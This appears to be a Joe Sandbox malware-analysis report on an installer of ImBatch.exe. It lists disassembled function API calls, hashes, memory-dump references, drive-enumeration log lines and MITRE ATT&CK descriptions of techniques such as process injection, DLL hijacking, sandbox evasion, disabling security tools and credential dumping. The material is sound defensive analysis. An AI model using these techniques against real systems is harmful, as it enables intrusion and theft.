Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: MessageSend
String ID: SELECTED$even$odd$selected
API String ID: 3850602802-1777954622
Opcode ID: e382a87ff6ccae37168218d97fd520eac5522518b6b745a999e4d47b0d6caded
Instruction ID: 3f1f1ea9e989e5eb70e0036e3ffd37ea9febda39d32afa8c6ae6efcd5b26ab4d
Opcode Fuzzy Hash: e382a87ff6ccae37168218d97fd520eac5522518b6b745a999e4d47b0d6caded
Instruction Fuzzy Hash: 6D71C334A10249AFEB00DFA9C981E9DBBB6EF44751F1180A5EA44EF366D730ED81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1090F004 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,00000000,00000000,1090F147,?,?,?,00000000,00000000,?,1090F32C,00000000,1090F5FF,?,10AA0334,00000000), ref: 1090F063
GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,1090F147,?,?,?,00000000,00000000,?,1090F32C,00000000,1090F5FF), ref: 1090F101
GetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,1090F147,?,?,?,00000000,00000000,?,1090F32C,00000000,1090F5FF), ref: 1090F120
SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1090F147,?,?,?,00000000,00000000,?,1090F32C), ref: 1090F12C

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: File$AttributesTemp$NamePath
String ID:
API String ID: 605459125-0
Opcode ID: 991953d952747b0a13e62588ef71b67a6d6eba03ce4d50e5b0199fc335b696b4
Instruction ID: e1c790f7e243815dd8ed3d2301727e9664fd3606ab04f011da94cb69c1113460
Opcode Fuzzy Hash: 991953d952747b0a13e62588ef71b67a6d6eba03ce4d50e5b0199fc335b696b4
Instruction Fuzzy Hash: 08315E38E04254DBDB12EB68CD6296E77FDEF44240B2181A4E800A772DEB74EF018691

Uniqueness

Uniqueness Score: -1.00%

Function 10809BFC Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 10809C0D
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 10809C6F
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 10809CCC
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 10809CFF

Part of subcall function 10809BB8: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,10809C7D), ref: 10809BCF
Part of subcall function 10809BB8: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,10809C7D), ref: 10809BEC

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: d4de0b39223cfc41bfdbc4a0b8b9aa177accadd5bf63b192658d8a9a26a06560
Instruction ID: 6f0c1c9c57ef8ce6e4b1db6c0f007c7062bf4d216d114722660507585c6d1f65
Opcode Fuzzy Hash: d4de0b39223cfc41bfdbc4a0b8b9aa177accadd5bf63b192658d8a9a26a06560
Instruction Fuzzy Hash: D0315E74E0822A9BDB00DFE8CC91AEEB3F9FF04310F404565E555E7298DB749A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 109FFF1C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000014), ref: 109FFF4B
EnterCriticalSection.KERNEL32(-000002F4,00000000,10A0013B), ref: 109FFF92
LeaveCriticalSection.KERNEL32(-000002F4,109FFFD6,10A0013B), ref: 109FFFC9

Part of subcall function 109F8794: EnterCriticalSection.KERNEL32(?,?,?,10A001B6,00000000,10A5A37C,00000000,10A5A469,?,00000000,10A5A48C,?,?,?,?), ref: 109F879F
Part of subcall function 109F8794: LeaveCriticalSection.KERNEL32(?,?,?,?,10A001B6,00000000,10A5A37C,00000000,10A5A469,?,00000000,10A5A48C,?,?,?,?), ref: 109F87B2

Strings

Stop Viewer, xrefs: 109FFF3B

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Sleep
String ID: Stop Viewer
API String ID: 2348874005-545046930
Opcode ID: 3f5d90cc72e54f0f12ea4945fb1f413fcc707f7c65e295343019ffe1e410d946
Instruction ID: 43448ce3cc998a3d4bade621135a8f8664fcdaeeb6da9b24bde6faa5ae08bac7
Opcode Fuzzy Hash: 3f5d90cc72e54f0f12ea4945fb1f413fcc707f7c65e295343019ffe1e410d946
Instruction Fuzzy Hash: 4E11D034A0820CAFDB02CB68DCA5B9EBBE8EF4A354F2501B8F50497291C735AD00D650

Uniqueness

Uniqueness Score: -1.00%

Function 108C3E48 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 108C3E55
GetCurrentProcessId.KERNEL32(?,00000000,00000000,108A3785,?,00000000,?,00000000,108A1980,?,00000000,00000200,0000020E,00000001), ref: 108C3E5E
GlobalFindAtomW.KERNEL32(00000000), ref: 108C3E73
GetPropW.USER32(00000000,00000000), ref: 108C3E8A

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 2c413778753e3d33c7083fd079c26c8e90b31dbb62da1a18141d5a5f2bdd46cc
Instruction ID: dc2edd3a99392d4563c28b8dadec4b8f06683acbe8745e4b532cadb69960687e
Opcode Fuzzy Hash: 2c413778753e3d33c7083fd079c26c8e90b31dbb62da1a18141d5a5f2bdd46cc
Instruction Fuzzy Hash: DDF0E56A30C326A69710BBFD4EC9EEF23ACCA002E03028820FD04D7614D520ED468370

Uniqueness

Uniqueness Score: -1.00%

Function 108598E8 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 108598F1
SelectObject.GDI32(00000000,058A00B4), ref: 10859903
GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 1085990E
ReleaseDC.USER32 ref: 1085991F

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 965778f90c6d860d75eb4025e91278e87245f13839377f994a5194417ad78660
Instruction ID: 37ed7c56d2068bb7de3d03ddb135cd8da6ffcc9ded71de31188f8cef904bcee5
Opcode Fuzzy Hash: 965778f90c6d860d75eb4025e91278e87245f13839377f994a5194417ad78660
Instruction Fuzzy Hash: 5EE0465560E6B126DA41A6A90C82BEF2A8CCF031E1F081125FD849A2A8EA05DA05D2F2

Uniqueness

Uniqueness Score: -1.00%

Function 10803C5C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 10804031

Strings

7, xrefs: 10803DD4
, xrefs: 10803F6A

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Message
String ID: $7
API String ID: 2030045667-2388253531
Opcode ID: b8ff70642cb8c738cac38a73f4c4023187b3ab9cb8983ae3d5ad15adf35d078a
Instruction ID: eef8d09a77b9303b6897a55f1877cb679b9436232708567385b2004a53575df3
Opcode Fuzzy Hash: b8ff70642cb8c738cac38a73f4c4023187b3ab9cb8983ae3d5ad15adf35d078a
Instruction Fuzzy Hash: 61B1A475B082A48BDB11DB2CCCC0B8AB7F8EB09654F1481F5E549EB349CB719D86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10A64EF8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

pdfPrintW.WPDFVIEW03(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,10A6506B,?,?,?,00000000,00000000), ref: 10A64FC6
pdfPrintW.WPDFVIEW03(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,10A6506B,?,?,?,00000000,00000000), ref: 10A65027

Strings

MEMORYSIZE=, xrefs: 10A64F8E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Print
String ID: MEMORYSIZE=
API String ID: 3558298466-1669415627
Opcode ID: 6c5e4e524fc3574a6c574fe8f52cf61bc4a5bf2887d1fd63ab0bd6352577b4c6
Instruction ID: 0649be9b2132c90c8928376141600470dfe3ffb98d00821704edb6c552eca0f0
Opcode Fuzzy Hash: 6c5e4e524fc3574a6c574fe8f52cf61bc4a5bf2887d1fd63ab0bd6352577b4c6
Instruction Fuzzy Hash: A041EB78A14619AFDB00EFACDC82EDEB7B9FF58210F504420F514B7254DA70BD498BA4

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
